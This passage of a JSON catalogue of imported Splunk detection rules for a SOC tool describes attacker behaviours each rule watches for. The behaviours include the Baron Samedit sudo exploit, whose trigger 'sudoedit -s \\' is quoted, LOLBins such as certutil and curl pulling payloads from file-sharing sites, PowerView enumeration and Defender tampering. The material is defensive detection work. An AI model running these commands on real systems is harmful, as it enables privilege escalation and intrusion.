This activity is significant as it is commonly associated with some malware infections, indicating potential malicious intent to harvest email information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1137" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-outlook-loadmacroprovideronboot-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "93c91139-01f8-4905-802b-0d106f026b13", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_outlook_loadmacroprovideronboot_persistence.yml" } }, { "id": "splunk-security-content-93c94be3-bead-4a60-860f-77ca3fe59903", "type": "detection", "name": "GetDomainGroup with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with command-line arguments that query for domain groups using `Get-DomainGroup`. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions mapped to the `Processes` node of the `Endpoint` data model. Monitoring this activity is crucial as `Get-DomainGroup` is part of PowerView, a tool often used by adversaries for domain enumeration and situational awareness. 
If confirmed malicious, this activity could allow attackers to gain insights into domain group structures, aiding in further exploitation and privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getdomaingroup-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "93c94be3-bead-4a60-860f-77ca3fe59903", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getdomaingroup_with_powershell.yml" } }, { "id": "splunk-security-content-93db24a0-fd21-45d7-9daf-84afd5a8cca2", "type": "detection", "name": "Cisco Secure Firewall - Citrix NetScaler Memory Overread Attempt", "description": "This analytic detects exploitation attempts against CVE-2025-5777 using Cisco Secure Firewall Intrusion Events.\nIt leverages Cisco Secure Firewall Threat Defense IntrusionEvent logs to identify cases where Snort signature 65118 (Citrix NetScaler memory overread attempt) is triggered.\nA triggered signature shows that an exploitation attempt reached the NetScaler, not that it succeeded: confirm the appliance's patch status and review the matching request and response before treating the event as a compromise. Against an unpatched appliance, this behavior is highly indicative of exploitation of CVE-2025-5777.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1203", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-citrix-netscaler-memory-overread-attempt.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "93db24a0-fd21-45d7-9daf-84afd5a8cca2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___citrix_netscaler_memory_overread_attempt.yml" } }, { "id": "splunk-security-content-93f114f6-cb1e-419b-ac3f-9e11a3045e70", "type": "detection", "name": "Windows Impair Defense Disable Win Defender Gen reports", "description": "The following analytic detects modifications in the Windows registry to disable Windows Defender generic reports. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the \"DisableGenericRePorts\" registry value. This activity is significant as it can prevent the transmission of error reports to Microsoft's Windows Error Reporting service, potentially hiding malicious activities. 
If confirmed malicious, this action could allow attackers to bypass Windows Defender detections, reducing the visibility of their activities and increasing the risk of undetected system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-win-defender-gen-reports.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "93f114f6-cb1e-419b-ac3f-9e11a3045e70", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_win_defender_gen_reports.yml" } }, { "id": "splunk-security-content-93fbec4e-0375-440c-8db3-4508eca470c4", "type": "detection", "name": "Detect Baron Samedit CVE-2021-3156", "description": "The following analytic detects attempts to exploit the Baron Samedit vulnerability (CVE-2021-3156) by identifying the use of the \"sudoedit -s \\\\\" command. This detection leverages logs from Linux systems, specifically searching for instances of the sudoedit command with the \"-s\" flag followed by a trailing backslash, as in the command shown above. Because it matches on the literal command line, it depends on process command-line logging being collected from the host and may not fire if the exploit is invoked with different spacing or quoting. This activity is significant because it indicates an attempt to exploit a known vulnerability that allows attackers to gain root privileges. 
If confirmed malicious, this could lead to complete system compromise, unauthorized access to sensitive data, and potential data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-baron-samedit-cve-2021-3156.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "93fbec4e-0375-440c-8db3-4508eca470c4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_baron_samedit_cve_2021_3156.yml" } }, { "id": "splunk-security-content-942548a3-0273-47a4-8dbd-e5202437395c", "type": "detection", "name": "O365 Application Available To Other Tenants", "description": "The following analytic identifies the configuration of Azure Active Directory Applications in a manner that allows authentication from external tenants or personal accounts. This configuration can lead to inappropriate or malicious access of any data or capabilities the application is allowed to access. 
This detection leverages the O365 Universal Audit Log data source.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-application-available-to-other-tenants.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "942548a3-0273-47a4-8dbd-e5202437395c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_application_available_to_other_tenants.yml" } }, { "id": "splunk-security-content-94396c3e-7728-422a-9956-e4b77b53dbdf", "type": "detection", "name": "O365 Email Reported By Admin Found Malicious", "description": "The following analytic detects when an email manually submitted to Microsoft through the Security & Compliance portal is found to be malicious. This capability is an enhanced protection feature that can be used within o365 tenants by administrative users to report potentially malicious emails. 
This correlation looks for any submission that returns a Phish or Malware verdict upon submission.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001", "T1566.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-reported-by-admin-found-malicious.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "94396c3e-7728-422a-9956-e4b77b53dbdf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_reported_by_admin_found_malicious.yml" } }, { "id": "splunk-security-content-94481a6a-8f59-4c86-957f-55a71e3612a6", "type": "detection", "name": "Azure AD Multiple Users Failing To Authenticate From Ip", "description": "The following analytic detects a single source IP failing to authenticate with 30 unique valid users within 5 minutes in Azure Active Directory. It leverages Azure AD SignInLogs with error code 50126, indicating invalid passwords. This behavior is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain initial access or elevate privileges by trying common passwords across many accounts. 
If confirmed malicious, this activity could lead to unauthorized access, data breaches, or privilege escalation within the Azure AD environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003", "T1110.004", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-multiple-users-failing-to-authenticate-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "94481a6a-8f59-4c86-957f-55a71e3612a6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_multiple_users_failing_to_authenticate_from_ip.yml" } }, { "id": "splunk-security-content-94531a31-a041-4777-909f-cd92ed3b71ad", "type": "detection", "name": "Cisco Isovalent - Cron Job Creation", "description": "The following analytic detects the creation of a cron job within the Cisco Isovalent environment. It identifies this activity by monitoring process execution logs for cron job creation events. This behavior is significant for a SOC as it could allow an attacker to execute malicious tasks repeatedly and automatically, posing a threat to the Kubernetes infrastructure. 
If confirmed malicious, this activity could lead to persistent attacks, service disruptions, or unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003", "T1053.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-isovalent-cron-job-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "94531a31-a041-4777-909f-cd92ed3b71ad", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_isovalent___cron_job_creation.yml" } }, { "id": "splunk-security-content-94665d8c-b841-4ff4-acb4-34d613e2cbfe", "type": "detection", "name": "Zscaler Exploit Threat Blocked", "description": "The following analytic identifies potential exploit attempts involving command and script interpreters blocked by Zscaler. It leverages web proxy logs to detect incidents where actions are blocked due to exploit references. The detection compiles statistics by user, threat name, URL, hostname, file class, and filename. This activity is significant as it helps identify and mitigate exploit attempts, which are critical for maintaining security. 
If confirmed malicious, such activity could lead to unauthorized code execution, privilege escalation, or persistent access within the environment, posing a severe threat to organizational security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-exploit-threat-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "94665d8c-b841-4ff4-acb4-34d613e2cbfe", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_exploit_threat_blocked.yml" } }, { "id": "splunk-security-content-94859172-a521-474f-97ac-4cf4b09634a3", "type": "detection", "name": "Windows System Remote Discovery With Query", "description": "The following analytic detects the execution of `query.exe` with command-line arguments aimed at discovering data on remote devices. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as adversaries may use `query.exe` to gain situational awareness and perform Active Directory discovery on compromised endpoints. 
If confirmed malicious, this behavior could allow attackers to identify various details about a system, aiding in further lateral movement and privilege escalation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-remote-discovery-with-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "94859172-a521-474f-97ac-4cf4b09634a3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_remote_discovery_with_query.yml" } }, { "id": "splunk-security-content-94994255-3acf-4213-9b3f-0494df03bb31", "type": "detection", "name": "Cloud Provisioning Activity From Previously Unseen Country", "description": "The following analytic detects cloud provisioning activities originating from previously unseen countries. It leverages cloud infrastructure logs and compares the geographic location of the source IP address against a baseline of known locations. This activity is significant as it may indicate unauthorized access or potential compromise of cloud resources. 
If confirmed malicious, an attacker could gain control over cloud assets, leading to data breaches, service disruptions, or further infiltration into the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cloud-provisioning-activity-from-previously-unseen-country.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "94994255-3acf-4213-9b3f-0494df03bb31", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/cloud_provisioning_activity_from_previously_unseen_country.yml" } }, { "id": "splunk-security-content-94cb89aa-aec1-4585-91b1-affcdacf357e", "type": "detection", "name": "GitHub Enterprise Remove Organization", "description": "The following analytic detects when a user removes an organization from GitHub Enterprise. The detection monitors GitHub Enterprise audit logs for organization deletion events, which could indicate unauthorized removal of critical business resources. For a SOC, identifying organization removals is crucial as it may signal account compromise, insider threats, or malicious attempts to disrupt business operations by deleting entire organizational structures. The impact could be severe, potentially resulting in loss of source code, repositories, team structures, access controls, and other critical organizational assets. This disruption could halt development workflows, cause data loss, and require significant effort to restore from backups if available. 
Additionally, unauthorized organization removal could be part of a larger attack campaign aimed at destroying or compromising enterprise assets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-remove-organization.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "94cb89aa-aec1-4585-91b1-affcdacf357e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_remove_organization.yml" } }, { "id": "splunk-security-content-94e3ba29-6245-4f25-8d47-d5b6b34c40ac", "type": "detection", "name": "Windows Outlook Dialogs Disabled from Unusual Process", "description": "The following analytic detects the modification of the Windows Registry key \"PONT_STRING\" under Outlook Options. This disables certain dialog popups, which could allow malicious scripts to run without notice. This detection leverages data from the Endpoint.Registry datamodel to search for this key changing from an unusual process. 
This activity is significant as it is commonly associated with some malware infections, indicating potential malicious intent to harvest email information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-outlook-dialogs-disabled-from-unusual-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "94e3ba29-6245-4f25-8d47-d5b6b34c40ac", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_outlook_dialogs_disabled_from_unusual_process.yml" } }, { "id": "splunk-security-content-94ebc001-35e7-4ae8-9b0e-52766b2f99c7", "type": "detection", "name": "Cisco NVM - Suspicious Download From File Sharing Website", "description": "This analytic detects suspicious downloads from common file sharing and content delivery platforms using known living-off-the-land binaries (LOLBins)\nsuch as 'curl.exe', 'certutil.exe', 'msiexec.exe', 'powershell.exe', 'wmic.exe', and others.\nIt leverages Cisco Network Visibility Module logs to correlate network flow activity with process context, including command-line arguments, process path,\nand parent process information. 
These tools are often abused by adversaries and malware to retrieve payloads from public hosting platforms\nsuch as GitHub, Discord CDN, Transfer.sh, or Pastebin.\nThis detection helps identify potential initial access, payload staging, or command and control activity using legitimate services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-suspicious-download-from-file-sharing-website.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "94ebc001-35e7-4ae8-9b0e-52766b2f99c7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___suspicious_download_from_file_sharing_website.yml" } }, { "id": "splunk-security-content-94fc85a1-e55b-4265-95e1-4b66730e05c0", "type": "detection", "name": "Headless Browser Mockbin or Mocky Request", "description": "The following analytic detects headless browser activity accessing mockbin.org or mocky.io. It identifies processes with the \"--headless\" and \"--disable-gpu\" command line arguments, along with references to mockbin.org or mocky.io. This behavior is significant as headless browsers are often used for automated tasks, including malicious activities like web scraping or automated attacks. 
If confirmed malicious, this activity could indicate an attempt to bypass traditional browser security measures, potentially leading to data exfiltration or further exploitation of web applications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/headless-browser-mockbin-or-mocky-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "94fc85a1-e55b-4265-95e1-4b66730e05c0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/headless_browser_mockbin_or_mocky_request.yml" } }, { "id": "splunk-security-content-95165985-ace5-4d42-9c42-93a89a5af901", "type": "detection", "name": "Linux Auditd Install Kernel Module Using Modprobe Utility", "description": "The following analytic detects the installation of a Linux kernel module using the modprobe utility. It leverages data from Linux Auditd, focusing on process names and command-line executions. This activity is significant because installing a kernel module can indicate an attempt to deploy a rootkit or other malicious kernel-level code, potentially leading to elevated privileges and bypassing security detections. 
If confirmed malicious, this could allow an attacker to gain persistent, high-level access to the system, compromising its integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-install-kernel-module-using-modprobe-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "95165985-ace5-4d42-9c42-93a89a5af901", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_install_kernel_module_using_modprobe_utility.yml" } }, { "id": "splunk-security-content-952e80d0-e343-439b-83f4-808c3e6fbf2e", "type": "detection", "name": "Azure AD PIM Role Assignment Activated", "description": "The following analytic detects the activation of an Azure AD Privileged Identity Management (PIM) role. It leverages Azure Active Directory events to identify when a user activates a PIM role assignment, indicated by the \"Add member to role completed (PIM activation)\" operation. Monitoring this activity is crucial as PIM roles grant elevated privileges, and unauthorized activation could indicate an adversary attempting to gain privileged access. 
If confirmed malicious, this could lead to unauthorized administrative actions, data breaches, or further compromise of the Azure environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-pim-role-assignment-activated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "952e80d0-e343-439b-83f4-808c3e6fbf2e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_pim_role_assignment_activated.yml" } }, { "id": "splunk-security-content-953322db-128a-4ce9-8e89-56e039e33d98", "type": "detection", "name": "Windows Suspect Process With Authentication Traffic", "description": "The following analytic detects executables running from public or temporary locations that are communicating over Windows domain authentication ports/protocols such as LDAP (389), LDAPS (636), and Kerberos (88). It leverages network traffic data to identify processes originating from user-controlled directories. This activity is significant because legitimate applications rarely run from these locations and attempt domain authentication, making it a potential indicator of compromise. 
If confirmed malicious, attackers could leverage this to access domain resources, potentially leading to further exploitation and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-suspect-process-with-authentication-traffic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "953322db-128a-4ce9-8e89-56e039e33d98", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_suspect_process_with_authentication_traffic.yml" } }, { "id": "splunk-security-content-9556f7b7-285f-4f18-8eeb-963d989f9d27", "type": "detection", "name": "Windows AppLocker Rare Application Launch Detection", "description": "The following analytic detects the launch of rarely used applications within the environment, which may indicate the use of potentially malicious software or tools by attackers. It leverages Windows AppLocker event logs, aggregating application launch counts over time and flagging those that significantly deviate from the norm. This behavior is significant as it helps identify unusual application activity that could signal a security threat. 
If confirmed malicious, this activity could allow attackers to execute unauthorized code, potentially leading to further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-applocker-rare-application-launch-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9556f7b7-285f-4f18-8eeb-963d989f9d27", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_applocker_rare_application_launch_detection.yml" } }, { "id": "splunk-security-content-95a7f9a5-6096-437e-a19e-86f42ac609bd", "type": "detection", "name": "Detect Excessive User Account Lockouts", "description": "The following analytic identifies user accounts experiencing an excessive number of lockouts within a short timeframe. It leverages the 'Change' data model, specifically focusing on events where the result indicates a lockout. This activity is significant as it may indicate a brute-force attack or misconfiguration, both of which require immediate attention. 
If confirmed malicious, this behavior could lead to account compromise, unauthorized access, and potential lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-excessive-user-account-lockouts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "95a7f9a5-6096-437e-a19e-86f42ac609bd", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_excessive_user_account_lockouts.yml" } }, { "id": "splunk-security-content-95b11d20-e2c6-46a5-b526-8629f5f0860a", "type": "detection", "name": "Windows PUA Named Pipe", "description": "The following analytic detects the creation or connection to named pipes used by potentially unwanted applications (PUAs) like VPNs or utilities like PsExec.\nIt leverages Sysmon EventCodes 17 and 18.\nIf confirmed malicious, this could allow an attacker to abuse these to potentially gain persistence, command and control, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1559", "T1021.002", "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-pua-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "splunk/security_content", "source_id": "95b11d20-e2c6-46a5-b526-8629f5f0860a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_pua_named_pipe.yml" } }, { "id": "splunk-security-content-95b8061a-0a67-11ec-85ec-acde48001122", "type": "detection", "name": "PetitPotam Network Share Access Request", "description": "The following analytic detects network share access requests indicative of the PetitPotam attack (CVE-2021-36942). It leverages Windows Event Code 5145, which logs attempts to access network share objects. This detection is significant as PetitPotam can coerce authentication from domain controllers, potentially leading to unauthorized access. If confirmed malicious, this activity could allow attackers to escalate privileges or move laterally within the network, posing a severe security risk. Ensure Event Code 5145 is enabled via Group Policy to utilize this analytic effectively.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1187" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/petitpotam-network-share-access-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "95b8061a-0a67-11ec-85ec-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/petitpotam_network_share_access_request.yml" } }, { "id": 
"splunk-security-content-95cf4608-4302-11ec-8194-3e22fbd008af", "type": "detection", "name": "Scheduled Task Initiation on Remote Endpoint", "description": "The following analytic detects the use of 'schtasks.exe' to start a Scheduled Task on a remote endpoint. This detection leverages Endpoint Detection and Response (EDR) data, focusing on process details such as process name, parent process, and command-line executions. This activity is significant as adversaries often abuse Task Scheduler for lateral movement and remote code execution. If confirmed malicious, this behavior could allow attackers to execute arbitrary code remotely, potentially leading to further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/scheduled-task-initiation-on-remote-endpoint.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "95cf4608-4302-11ec-8194-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/scheduled_task_initiation_on_remote_endpoint.yml" } }, { "id": "splunk-security-content-95f8acd6-978e-42d6-99c1-85baacdd2b46", "type": "detection", "name": "Windows Chromium process Launched with Disable Popup Blocking", "description": "The following analytic detects instances where a Windows Chromium-based browser process is launched with the `--disable-popup-blocking` flag. 
